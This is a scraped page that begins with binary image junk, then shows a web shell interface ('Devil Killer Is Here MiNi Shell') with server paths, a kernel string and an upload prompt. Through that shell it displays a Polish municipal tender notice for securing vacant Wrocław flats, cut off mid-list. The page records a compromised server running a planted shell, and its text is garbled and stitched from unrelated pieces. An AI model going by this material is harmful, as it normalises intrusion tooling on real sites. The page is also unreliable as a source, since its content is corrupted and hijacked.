JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250304/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250304/0012967801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych zabezpieczających lokale (pustostany), budynki nie zamieszkałe, obiekty małej architektury oraz tereny zewnętrzne, stanowiące własność Gminy Wrocław. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wrocławskie Mieszkania Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020610504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Namysłowska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-304</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wm.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wm.wroc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Wrocławskie Mieszkania Sp. z o. o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">8982123598</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Namysłowska 8</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">50-304</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@wm.wroc.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.wm.wroc.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych zabezpieczających lokale (pustostany), budynki nie zamieszkałe, obiekty małej architektury oraz tereny zewnętrzne, stanowiące własność Gminy Wrocław. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6c2ebf0c-8f3a-48ba-ab03-c6b449af96aa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00129678</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00122238/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 21_Roboty zabezpieczające wolne lokale mieszkalne (pustostany) poprzez wymianę drzwi zewnętrznych do lokali na antywłamaniowe wraz z obróbką ościeży w rejonie D, E, M, N, C, L, J, K (cały zasób)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wroclawskiemieszkania.ezamawiajacy.pl/pn/WROCMIE/demand/196596/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej wyłącznie za pośrednictwem Platformy przetargowej pod adresem:<br/>https://wroclawskiemieszkania.ezamawiajacy.pl/pn/WROCMIE/demand/196596/notice/public/details<br/>W pozostałym zakresie, w szczególności przekazywania wniosków o wyjaśnienie SWZ, oświadczeń, dokumentów składanych na wezwanie Zamawiającego, w tym podmiotowych śr. dowodowych, zawiadomień, wyjaśnień, zgód, informacji: Platforma, za pośrednictwem kafelka Wiadomości (dostępnego po przystąpieniu do postępowania), a w przypadku wniosków o wyjaśnienie SWZ dodatkowo również przy użyciu akcji: Zadaj pytanie (dostępnego po przystąpieniu do postępowania).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu (Platformy), <br/>na subdomenie Zamawiającego, dostępnej na stronie: https://wroclawskiemieskzania.ezamawiajacy.pl lub <br/>za pośrednictwem strony: https://oneplace.marketplanet.pl;<br/>2)	Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania albo do założenia bezpłatnego konta, poprzez wykonanie poniższych kroków procesu rejestracyjnego: <br/>a)	podanie adres e-mail, <br/>b)	ustanawianie hasła, z obowiązkiem jego powtórzenia, <br/>c)	wpisanie kodu z obrazka, <br/>d)	potwierdzenie zapoznania się i akceptację „Regulamin korzystania z Marketplanet OnePlace”, a także informacji o przetwarzaniu danych osobowych, <br/>e)	zaznaczenie wymaganych zgód,<br/>f)	kliknięcie polecenia „Zarejestruj się”;<br/>3)	rejestracja konta następuje poprzez kontakt z numerem telefonu podanym w potwierdzeniu. Jeżeli użytkownik (Wykonawca) nie skontaktuje się telefonicznie z numerem podanym w potwierdzeniu, konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych;<br/>4)	kafelek: „Formularz oferty” / podsekcja „Przygotowanie oferty” służy Wykonawcy do złożenia oferty oraz oświadczeń i / lub dokumentów składanych wraz z nią. <br/>a)	Wykonawca, w celu zaszyfrowania oferty oraz dokumentów i / lub oświadczeń składanych wraz z nią, zobowiązany będzie do nadania dowolnego, własnego hasła (zgodnie <br/>z informacjami wyświetlonymi w okienku: „Szyfrowanie ofert wraz ze wszystkimi załączonymi dokumentami”, widocznym po kliknięciu kafelka: „Formularz oferty”) <br/>i zatwierdzenie tego hasła,<br/>b)	wczytanie plików następuje poprzez polecenie: „Przeciągnij tutaj lub Wybierz plik <br/>z dysku”, w sekcji: „Przygotowanie oferty”, podsekcja: „Dokumenty do oferty”,<br/>c)	Wykonawca winien opisać załączniki nazwą umożliwiającą ich identyfikację,<br/>d)	Wykonawca załączając dokument określa jego typ poprzez wybór z rozwijanej listy odpowiedniego opisu: <br/>	„Dokument jawny”,<br/>albo<br/>	„Dokument zawiera tajemnicę przedsiębiorstwa”,<br/>odpowiednio dla dokumentu niezawierającego bądź zawierającego informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. <br/>o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r. poz. 1233),<br/>e)	złożenie oferty wraz z oświadczeniami i / lub dokumentami składanymi wraz z nią, następuje poprzez polecenie „Złóż ofertę”,<br/>f)	oferta może być złożona tylko do upływu terminu składania ofert,<br/>g)	potwierdzeniem prawidłowo złożonej oferty jest komunikat systemowy „Oferta została złożona” oraz wygenerowany raport złożonej oferty. Wykonawca generuje raport z akcji „Historia zmian”, pobierając odpowiedni plik,<br/>h)	o terminie złożenia Oferty decyduje czas pełnego przeprocesowania transakcji <br/>na Platformie.<br/>5)	kafelek: „Wiadomości” (dostępny po przystąpieniu do postępowania) służy Wykonawcy <br/>do przekazania wniosków o wyjaśnienie treści SWZ przed upływem terminu składania ofert oraz oświadczeń i dokumentów składanych po upływie tego terminu (np. na wezwanie Zamawiającego). Wnioski o wyjaśnienie mogą być również składane przy użyciu akcji: „Zadaj pytanie” – dostępnej przed przystąpieniem do postępowania;<br/>6)	za datę wpływu dokumentów i / lub informacji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę ich wpływu <br/>na Platformę;<br/>7)	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego, za pośrednictwem infolinii dostępnej w dni robocze, w godzinach <br/>od 9.00 do 17.00, pod nr tel.: +48 22 257 22 23 lub za pośrednictwem poczty elektronicznej pod podanym poniżej adresem e-mail: oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zostały określone w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WM/SZP/TP/5/2025/G</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót zabezpieczających wolne lokale mieszkalne (pustostany), budynki niezamieszkałe, obiekty małej architektury oraz tereny zewnętrzne stanowiących własność Gminy Wrocław w rejonach D, E, M, N.<br/>3.	Szczegółowy zakres obowiązków stron i opis przedmiotu zamówienia określają:<br/>a)	Projektowane postanowienia umowy (załącznik nr 3 do SWZ).<br/>b)	Wykaz typowych prac zabezpieczających – załącznik nr 5 do SWZ<br/>c)	STWIOR - załącznik nr 6 do SWZ.<br/>d)	Opis wymagań jakościowych - załącznik nr 7 do SWZ<br/>e)	Podział na rejony - załącznik nr 8 do SWZ.<br/>f)	Przedmiar robót – załącznik nr 9 do SWZ<br/>4.	Zgodnie z art. 246 ust. 2 ustawy Prawo zamówień publicznych Zamawiający zastosował kryterium ceny o wadze przekraczającej 95%, ponieważ określił w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia.<br/>5.	Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>1)	Wykucie z muru ościeżnic i zabezpieczenie okien, <br/>2)	Wykucie drzwi zewnętrznych i wewnętrznych,<br/>3)	Montaż i demontaż płyt OSB,<br/>4)	Naprawa stolarki drzwiowej,<br/>5)	Demontaż, naprawa i ponowny montaż drzwi, <br/>6)	Wymiana zamków wpuszczanych, klamek z szyldami oraz regulacja drzwi wewnętrznych,<br/>7)	Rozmurowanie otworów (1 m2) ścian gr 12 cm z wywozem gruzu (0,05 m3) w celu udostępnienia nieruchomości,<br/>8)	Rozmurowanie otworów ścian gr 24 cm z wywozem gruzu ,<br/>9)	Zamurowanie otworów z bloczków gazobetonowych gr 12 cm wraz z otynkowaniem od strony zewnętrznej tynkiem kategorii I wraz ze zbrojeniem prętami stalowymi o średnicy 8-12 mm co drugi bloczek,<br/>10)	Zamurowanie otworów z bloczków gazobetonowych gr 24 cm wraz z otynkowaniem od strony zewnętrznej tynkiem kategorii I wraz ze zbrojeniem prętami stalowymi o średnicy 8-12 mm co drugi bloczek,<br/>11)	Montaż drzwi zewnętrznych antywłamaniowych do lokalu,<br/>12)	Wymiana drzwi zewnętrznych na antywłamaniowe wraz z obróbką ościeży, <br/>13)	Zabezpieczenie odpadających tynków zewnętrznych (zagrażających bezpieczeństwu osób i mienia),<br/>14)	Tynk zewnętrzny zwykły kategorii pierwszej o pow. do 2m w jednym miejscu (obróbki – w szczególności w budynkach zasiedlonych),<br/>15)	Tynk zewnętrzny zwykły kategorii pierwszej o pow. do 5m w jednym miejscu (obróbki – w szczególności w budynkach zasiedlonych),<br/>16)	Naprawa lub Zabezpieczenie okienek dachowych lub wyłazów (w budynkach wysiedlonych),<br/>17)	Demontaż urządzeń sanitarnych: ustępu z miską fajansową, zlewozmywaka, umywalki,<br/>18)	Demontaż baterii zlewozmywakowej, wannowej i umywalkowej,<br/>19)	Zakorkowanie podejścia gazowego korkami o średnicy 15-20 mm,<br/>20)	Demontaż zaworu czerpalnego z zakorkowaniem podejścia o średnicy 15-20 mm.,<br/>21)	Demontaż przewodów instalacji elektrycznej z wykuciem bruzd, <br/>22)	Demontaż osprzętu modułowego,<br/>23)	Demontaż WLZ,<br/>24)	Inne prace polegające na zabezpieczeniu lokali (pustostanów), budynków niezamieszkałych, obiektów małej architektury oraz terenów zewnętrznych stanowiących własność Gminy Wrocław.<br/>6.	Wykonawca udzieli na wykonane roboty 12 miesięcznej gwarancji. Bieg terminu gwarancji rozpoczyna się w dniu następnym po zakończeniu odbioru robót. Wykonawca zobowiązany jest również przekazać Zamawiającemu dokumenty gwarancji wystawione przez producentów/sprzedawców urządzeń wmontowanych podczas realizacji umowy, o ile sam nie jest ich producentem, wraz z innymi dokumentami niezbędnymi do realizacji uprawnień wynikających z gwarancji oraz przenieść uprawnienia z tytułu rękojmi, jakie posiada wobec sprzedawców wmontowanych urządzeń.<br/>7.	Okres rękojmi dotyczący przedmiotu umowy określa się na 24 miesiące. Bieg terminu rękojmi rozpoczyna się w dniu następnym po zakończeniu odbioru robót.<br/>8.	Jeżeli przedmiot zamówienia będzie wykonywany na nieruchomościach zabudowanych zamieszkałych lub użytkowych, Wykonawca zobowiązuje się prowadzić prace z poszanowaniem miru domowego i mienia mieszkańców oraz dostępu do nieruchomości, jak również biorąc pod uwagę ciszę nocną oraz jak najmniejsze zakłócanie spokoju mieszkańców.<br/>9.	Roboty remontowe będą realizowane sukcesywnie w zależności od konieczności realizacji zleceń zgłaszanych przez Zamawiającego Wykonawcy. Każdorazowo o zakresie zlecenia decyduje Zamawiający. <br/>10.	Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający przewiduje, że wartość niezrealizowanych robót w trakcie trwania umowy nie przekroczy 30 % łącznej wartości zamówienia określonej w § 4 ust. 1 umowy.<br/>11.	Szczegółowy zakres obowiązków stron i opis przedmiotu zamówienia został ujęty w projektowanych postanowieniach umowy stanowiących załącznik nr 7 do SWZ.<br/>12.	Zamawiający określa wymagania związane z zatrudnianiem osób, o których mowa <br/>w art. 95 ustawy Pzp. wykonawca i podwykonawca zobowiązują się zatrudniać w trakcie realizacji umowy na podstawie stosunku pracy w sposób określony w art. 22 § 1 ustawy z 26 czerwca 1974 r. Kodeks pracy osoby do wykonywania czynności bezpośrednio związanych z realizacją zamówienia tzn. wszystkie roboty budowlane wykonywane na terenie budowy w branży budowlanej, sanitarnej i elektrycznej opisane w dokumentacji projektowej, przez cały okres wykonywania tych czynności, z wyłączeniem kierownika budowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1018518,52 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>Całkowita wartość tych zamówień została uwzględniona przy obliczaniu jego wartości i wynosi do 50 % szacunkowej wartości zamówienia podstawowego dla zadania nr 1 i 2. Ewentualny zakres powyższych zamówień może dotyczyć całego zakresu zamówienia podstawowego. Zamówienia podobne, zostaną udzielone na warunkach określonych w umowie podstawowej. Wykonawca przed zawarciem umowy zobowiązany będzie złożyć oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie nie szerszym niż wskazane w postępowaniu o udzielenie zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne tj. zatrudnienie do realizacji zamówienia bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie robót zabezpieczających wolne lokale mieszkalne (pustostany), budynki niezamieszkałe, obiekty małej architektury oraz tereny zewnętrzne stanowiących własność Gminy Wrocław w rejonach C, L, J, K.<br/>3.	Szczegółowy zakres obowiązków stron i opis przedmiotu zamówienia określają:<br/>a)	Projektowane postanowienia umowy (załącznik nr 3 do SWZ).<br/>b)	Wykaz typowych prac zabezpieczających – załącznik nr 5 do SWZ<br/>c)	STWIOR - załącznik nr 6 do SWZ.<br/>d)	Opis wymagań jakościowych - załącznik nr 7 do SWZ<br/>e)	Podział na rejony - załącznik nr 8 do SWZ.<br/>f)	Przedmiar robót – załącznik nr 9 do SWZ<br/>4.	Zgodnie z art. 246 ust. 2 ustawy Prawo zamówień publicznych Zamawiający zastosował kryterium ceny o wadze przekraczającej 95%, ponieważ określił w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia.<br/>5.	Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>1)	Wykucie z muru ościeżnic i zabezpieczenie okien, <br/>2)	Wykucie drzwi zewnętrznych i wewnętrznych,<br/>3)	Montaż i demontaż płyt OSB,<br/>4)	Naprawa stolarki drzwiowej,<br/>5)	Demontaż, naprawa i ponowny montaż drzwi, <br/>6)	Wymiana zamków wpuszczanych, klamek z szyldami oraz regulacja drzwi wewnętrznych,<br/>7)	Rozmurowanie otworów (1 m2) ścian gr 12 cm z wywozem gruzu (0,05 m3) w celu udostępnienia nieruchomości,<br/>8)	Rozmurowanie otworów ścian gr 24 cm z wywozem gruzu ,<br/>9)	Zamurowanie otworów z bloczków gazobetonowych gr 12 cm wraz z 